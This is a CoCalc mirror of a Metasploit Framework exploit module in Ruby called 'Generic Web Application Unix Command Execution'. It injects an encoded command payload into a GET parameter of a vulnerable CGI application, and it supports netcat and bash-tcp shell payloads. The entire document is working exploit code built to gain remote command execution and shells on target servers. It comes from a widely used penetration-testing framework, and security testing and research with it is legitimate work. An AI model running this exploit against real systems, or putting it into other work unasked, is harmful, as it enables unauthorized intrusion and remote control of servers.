CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/webapp/generic_exec.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::Remote::HttpClient

11


12
  def initialize(info = {})

13
    super(update_info(info,

14
      'Name'           => 'Generic Web Application Unix Command Execution',

15
      'Description'    => %q{

16
          This module can be used to exploit any generic command execution vulnerability

17
        for CGI applications on Unix-like platforms. To use this module, specify the

18
        CMDURI path, replacing the command itself with XXcmdXX. This module is currently

19
        limited to forms vulnerable through GET requests with query parameters.

20
      },

21
      'Author'         => [ 'hdm' ],

22
      'License'        => MSF_LICENSE,

23
      'References'     => [ ],

24
      'Privileged'     => false,

25
      'Payload'        =>

26
        {

27
          'DisableNops' => true,

28
          'Space'       => 1024,

29
          'Compat'      =>

30
            {

31
              'PayloadType' => 'cmd cmd_bash',

32
              'RequiredCmd' => 'generic perl telnet netcat netcat-e bash-tcp',

33
            }

34
        },

35
      'Platform'       => 'unix',

36
      'Arch'           => ARCH_CMD,

37
      'Targets'        => [[ 'Automatic', { }]],

38
      'DisclosureDate' => '1993-11-14', # CGI historical date :)

39
      'DefaultTarget' => 0))

40


41
    register_options(

42
      [

43
        OptString.new('CMDURI', [true, "The full URI path with the XXcmdXX parameter", "/cgi-bin/generic?cmd=XXcmdXX"]),

44
      ])

45
  end

46


47
  def exploit

48
    uri = datastore['CMDURI'].to_s

49
    uri,query = uri.split('?', 2)

50


51
    if query

52
      query = query.split('&').map{|var|

53
        k,v = var.split('=', 2)

54
        Rex::Text.uri_encode(k) + "=" + Rex::Text.uri_encode(v.gsub("XXcmdXX", payload.encoded))

55
      }.join('&')

56
      uri = uri + '?' + query

57
    end

58


59
    print_status("Sending HTTP request for #{uri}")

60
    res = send_request_cgi( {

61
      'global' => true,

62
      'uri'    => uri

63
    }, 30)

64


65
    if res

66
      print_status("The server responded with HTTP CODE #{res.code}")

67
    else

68
      print_status("The server did not respond to our request")

69
    end

70


71
    handler

72
  end

73
end

74


75